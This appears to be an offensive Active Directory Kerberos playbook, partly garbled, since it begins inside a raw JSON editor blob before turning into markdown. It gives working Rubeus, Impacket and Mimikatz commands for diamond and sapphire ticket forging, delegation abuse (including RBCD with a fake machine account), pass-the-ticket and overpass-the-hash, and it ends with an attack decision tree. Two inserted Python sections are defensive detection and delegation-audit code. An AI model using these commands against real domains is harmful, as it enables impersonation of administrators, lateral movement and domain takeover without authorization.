/target:target.domain.com /service:cifs /rc4:SERVICE_HASH /ptt","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Target Service","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"SPN Format","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Use Case","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"File shares","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"cifs/host","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Access SMB shares","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"WinRM","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"http/host","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Remote 
PowerShell","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"LDAP","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"ldap/dc","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"DCSync-like queries","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"MSSQL","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"MSSQLSvc/host:1433","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Database access","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Exchange","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"http/mail.domain.com","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Mailbox access","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Diamond Ticket","type":"text"}]},{"type":"paragraph","content":[{"text":"Modify a legitimately issued TGT → harder to detect than golden ticket.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Rubeus — request real 
TGT then modify PAC\nRubeus.exe diamond /krbkey:KRBTGT_AES256 /user:administrator /domain:DOMAIN.COM /dc:DC01.DOMAIN.COM /ticketuser:targetadmin /ticketuserid:500 /groups:512 /ptt","type":"text"}]},{"type":"paragraph","content":[{"text":"Advantage","type":"text","marks":[{"type":"strong"}]},{"text":": The ticket's metadata (timestamps, enc type) matches a real TGT issuance.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Sapphire Ticket","type":"text"}]},{"type":"paragraph","content":[{"text":"Uses S4U2Self to get a real PAC for the target user, then embeds it in a forged ticket.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Rubeus\nRubeus.exe diamond /krbkey:KRBTGT_AES256 /ticketuser:administrator /ticketuserid:500 /groups:512 /tgtdeleg /ptt","type":"text"}]},{"type":"paragraph","content":[{"text":"Advantage","type":"text","marks":[{"type":"strong"}]},{"text":": PAC is a genuine copy from KDC, making detection extremely difficult.","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"5. 
DELEGATION ATTACKS","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Unconstrained Delegation","type":"text"}]},{"type":"paragraph","content":[{"text":"Hosts with unconstrained delegation store user TGTs in memory.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enumerate (PowerView)\nGet-DomainComputer -Unconstrained | Select-Object dnshostname\n\n# Coerce admin authentication → capture TGT (Rubeus monitor mode)\nRubeus.exe monitor /interval:5 /nowrap\n\n# Trigger via PrinterBug / PetitPotam → DC authenticates → TGT captured\nSpoolSample.exe DC01.domain.com COMPROMISED_HOST.domain.com","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Constrained Delegation (S4U2Proxy)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enumerate\nGet-DomainComputer -TrustedToAuth | Select-Object dnshostname,msds-allowedtodelegateto\n\n# S4U2Self + S4U2Proxy → get TGS for allowed service as any user\ngetST.py -spn cifs/target.domain.com -impersonate administrator DOMAIN/svc_account:password -dc-ip DC_IP\n\n# Rubeus\nRubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target.domain.com /ptt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Resource-Based Constrained Delegation (RBCD)","type":"text"}]},{"type":"paragraph","content":[{"text":"Requires write access to ","type":"text"},{"text":"msDS-AllowedToActOnBehalfOfOtherIdentity","type":"text","marks":[{"type":"code_inline"}]},{"text":" on the target.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# 1. Create or control a computer account (MAQ > 0)\naddcomputer.py -computer-name 'FAKE

```bash
    -computer-pass 'P@ss123' -dc-ip DC_IP DOMAIN/user:password

# 2. Set RBCD on target
rbcd.py -delegate-from 'FAKE$' -delegate-to 'TARGET$' -dc-ip DC_IP -action write DOMAIN/user:password

# 3. S4U2Self + S4U2Proxy from controlled account
getST.py -spn cifs/TARGET.DOMAIN.COM -impersonate administrator DOMAIN/'FAKE$':'P@ss123' -dc-ip DC_IP

# 4. Use the ticket
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass DOMAIN/administrator@TARGET.DOMAIN.COM
```

---

## 6. PASS-THE-TICKET & OVERPASS-THE-HASH

### Pass-the-Ticket

```bash
# Impacket — use .ccache ticket
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py -k -no-pass DOMAIN/user@TARGET.DOMAIN.COM

# Mimikatz — inject .kirbi ticket into session
kerberos::ptt ticket.kirbi

# Rubeus
Rubeus.exe ptt /ticket:base64_ticket_blob
```

### Overpass-the-Hash (Pass-the-Key)

Use the NTLM hash as the account's RC4 Kerberos key to request a TGT → pure Kerberos authentication from then on (no NTLM authentication is logged). The TGT request itself is still recorded by the DC as a Kerberos event, and an RC4-encrypted TGT request in a domain that otherwise negotiates AES is the indicator defenders look for.

```bash
# Impacket
getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache

# Rubeus (from Windows)
Rubeus.exe asktgt /user:administrator /rc4:NTLM_HASH /ptt

# Mimikatz
sekurlsa::pth /user:administrator /domain:DOMAIN.COM /ntlm:NTLM_HASH /run:cmd.exe
```

---
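The defender's side of the two techniques above, as an added example that is not part of the original playbook: a small triage routine over Kerberos audit events. It assumes events already parsed from the Windows Security log into records carrying the 4768/4769 fields `TargetUserName`, `IpAddress` and `TicketEncryptionType`; the sample events below are constructed, not captured from any environment. It flags a TGT issued with RC4 (the signature of overpass-the-hash with an NT hash when accounts normally use AES) and a service-ticket request from a host that never obtained a TGT for that user (a ticket that was injected rather than requested).

```python
"""Triage constructed Kerberos audit events (4768 = TGT request, 4769 = service-ticket
request) for overpass-the-hash with an RC4 key and for pass-the-ticket."""
from collections import defaultdict
from dataclasses import dataclass

RC4_HMAC = 0x17            # TicketEncryptionType for RC4-HMAC (the NT hash is the key)
AES_ETYPES = {0x11, 0x12}  # AES128 / AES256, the expected types in a hardened domain


@dataclass
class KerbEvent:
    event_id: int      # 4768 or 4769
    user: str          # TargetUserName
    client_ip: str     # IpAddress
    etype: int         # TicketEncryptionType
    ts: int            # seconds since the start of the constructed window
    service: str = ""  # ServiceName (4769 only)


# Constructed sample events (assumption: not from any real environment).
SAMPLE_EVENTS = [
    KerbEvent(4768, "alice", "10.0.0.5", 0x12, 0),
    KerbEvent(4769, "alice", "10.0.0.5", 0x12, 100, "cifs/FS01"),
    # NT hash used as RC4 key to obtain a TGT (asktgt /rc4, getTGT.py -hashes)
    KerbEvent(4768, "administrator", "10.0.0.99", RC4_HMAC, 200),
    KerbEvent(4769, "administrator", "10.0.0.99", 0x12, 210, "cifs/DC01"),
    # Service ticket used from a host with no TGT request for that user (pass-the-ticket)
    KerbEvent(4769, "bob", "10.0.0.77", 0x12, 300, "cifs/FS01"),
    KerbEvent(4769, "WS02$", "10.0.0.12", 0x12, 310, "ldap/DC01"),  # machine account: ignored
]


def rc4_tgt_requests(events):
    """4768 events whose TGT was issued with RC4: overpass-the-hash with an NT hash
    in a domain whose accounts normally negotiate AES."""
    return [e for e in events if e.event_id == 4768 and e.etype == RC4_HMAC]


def tickets_without_tgt(events, window_s=10 * 3600):
    """4769 events for user accounts where no 4768 for the same user came from the
    same client IP within window_s beforehand: the TGT reached that host by
    injection rather than by a normal AS exchange."""
    tgt_times = defaultdict(list)
    for e in events:
        if e.event_id == 4768:
            tgt_times[(e.user, e.client_ip)].append(e.ts)
    hits = []
    for e in events:
        if e.event_id != 4769 or e.user.endswith("$"):
            continue  # machine accounts renew on their own schedule; keep them out of this rule
        prior = [t for t in tgt_times[(e.user, e.client_ip)] if 0 <= e.ts - t <= window_s]
        if not prior:
            hits.append(e)
    return hits


def triage(events):
    """Return {indicator: [user names]} as a quick SOC summary."""
    return {
        "rc4_tgt": [e.user for e in rc4_tgt_requests(events)],
        "ticket_without_tgt": [e.user for e in tickets_without_tgt(events)],
    }


if __name__ == "__main__":
    for indicator, users in triage(SAMPLE_EVENTS).items():
        print(f"{indicator}: {users}")
```

Both rules are heuristics. The RC4 rule only means something once AES is actually enabled on the accounts in question; legacy accounts without AES keys will request RC4 legitimately. The ticket-without-TGT rule produces false positives when the TGT predates the log window or the client changed address (VPN, DHCP), so treat it as a correlation lead rather than a verdict.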
## 7. KERBEROS DOUBLE HOP PROBLEM

When authenticating via Kerberos across two hops (A → B → C), B cannot forward A's credentials to C by default: B holds only a service ticket for itself, not A's TGT.

### Solutions

| Method | How | Risk |
| --- | --- | --- |
| CredSSP | Sends actual credentials to B | Credential exposure |
| Unconstrained delegation on B | B stores A's TGT | Over-privileged |
| Constrained delegation | B allowed to delegate to C | Preferred — scoped |
| RBCD | C trusts B to delegate | Modern, flexible |
| Invoke-Command nested | `-Credential` param in nested session | Exposes password in script |

---
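An added example, not from the original playbook, that turns the risk column of the table above into an audit: it classifies accounts by their delegation configuration and flags the settings that matter (unconstrained delegation on anything other than a domain controller, constrained delegation with protocol transition, RBCD targets whose trusted principals should be reviewed, and privileged accounts that are not marked "sensitive and cannot be delegated"). It runs offline on constructed attribute dictionaries; in practice the same dictionaries would be filled from an LDAP query. One assumption: `msDS-AllowedToActOnBehalfOfOtherIdentity` is a security descriptor in the directory, and here it is taken as already decoded to account names.

```python
"""Classify AD accounts by delegation configuration and flag the risky cases."""

# userAccountControl bits (documented Active Directory values)
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
DOMAIN_CONTROLLERS_RID = 516                # primaryGroupID of domain controllers

# Constructed sample objects (assumption: not taken from a real directory).
# msDS-AllowedToActOnBehalfOfOtherIdentity is assumed pre-decoded to account names.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000, "primaryGroupID": 516},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000, "primaryGroupID": 515},
    {"sAMAccountName": "svc-sql", "userAccountControl": 0x1000200,
     "msDS-AllowedToDelegateTo": ["cifs/FS01.DOMAIN.COM"]},
    {"sAMAccountName": "svc-web", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": ["http/API01.DOMAIN.COM"]},
    {"sAMAccountName": "FS01$", "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": ["WEB01$"]},
    {"sAMAccountName": "administrator", "userAccountControl": 0x200, "adminCount": 1},
    {"sAMAccountName": "svc-backup", "userAccountControl": 0x200 | NOT_DELEGATED, "adminCount": 1},
]


def classify_delegation(obj):
    """Map one account's attributes to the delegation type from the table."""
    uac = obj.get("userAccountControl", 0)
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if obj.get("msDS-AllowedToDelegateTo"):
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained-protocol-transition"
        return "constrained-kerberos-only"
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        return "rbcd-target"
    return "none"


def audit_delegation(objects):
    """Return (account, severity, reason) tuples, in directory order."""
    findings = []
    for o in objects:
        name = o["sAMAccountName"]
        uac = o.get("userAccountControl", 0)
        kind = classify_delegation(o)
        if kind == "unconstrained" and o.get("primaryGroupID") != DOMAIN_CONTROLLERS_RID:
            findings.append((name, "HIGH",
                             "unconstrained delegation on a non-DC: it caches every TGT sent to it"))
        elif kind == "constrained-protocol-transition":
            targets = ", ".join(o["msDS-AllowedToDelegateTo"])
            findings.append((name, "MEDIUM",
                             "protocol transition: can obtain tickets for any non-protected user to " + targets))
        elif kind == "rbcd-target":
            trusted = ", ".join(o["msDS-AllowedToActOnBehalfOfOtherIdentity"])
            findings.append((name, "INFO",
                             "RBCD: trusts " + trusted + " to delegate; review who can write this attribute"))
        # Privileged accounts should be undelegatable regardless of the service side.
        if o.get("adminCount") == 1 and not (uac & NOT_DELEGATED):
            findings.append((name, "MEDIUM",
                             "privileged account is not marked 'sensitive and cannot be delegated'"))
    return findings


if __name__ == "__main__":
    for account, severity, reason in audit_delegation(SAMPLE_OBJECTS):
        print(f"[{severity}] {account}: {reason}")
```

Membership in the Protected Users group gives the same protection as the NOT_DELEGATED bit and is not modelled here; add a `memberOf` check if your export includes it.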
## 8. KERBEROS ATTACK DECISION TREE

```
AD environment — targeting Kerberos
│
├── Have domain user creds?
│   ├── Kerberoast → crack service account hashes (§3)
│   ├── Enumerate users without preauth → AS-REP roast (§2)
│   ├── Enumerate delegation → unconstrained/constrained/RBCD (§5)
│   └── Enumerate SPNs for high-value accounts
│
├── Have service account hash?
│   ├── Silver ticket for that service (§4)
│   └── If constrained delegation → S4U2Proxy chain (§5)
│
├── Have krbtgt hash?
│   ├── Golden ticket → any user, any service (§4)
│   ├── Diamond ticket → stealthier forging (§4)
│   └── Sapphire ticket → hardest to detect (§4)
│
├── Compromised host with unconstrained delegation?
│   ├── Monitor for incoming TGTs (Rubeus monitor)
│   ├── Coerce DC authentication (PrinterBug/PetitPotam)
│   └── Capture DC TGT → DCSync
│
├── Can write to target's msDS-AllowedToActOnBehalfOfOtherIdentity?
│   └── RBCD attack (§5) → create machine account + delegate
│
├── Have NTLM hash but need Kerberos auth?
│   └── Overpass-the-Hash → request TGT (§6)
│
└── Have .kirbi / .ccache ticket?
    └── Pass-the-Ticket → use directly (§6)
```

---

Source: yaklang/hack-skills, skills/active-directory-kerberos-attacks/SKILL.md (author @skillopedia, 2026-06-05), https://github.com/yaklang/hack-skills/blob/HEAD/skills/active-directory-kerberos-attacks/SKILL.md
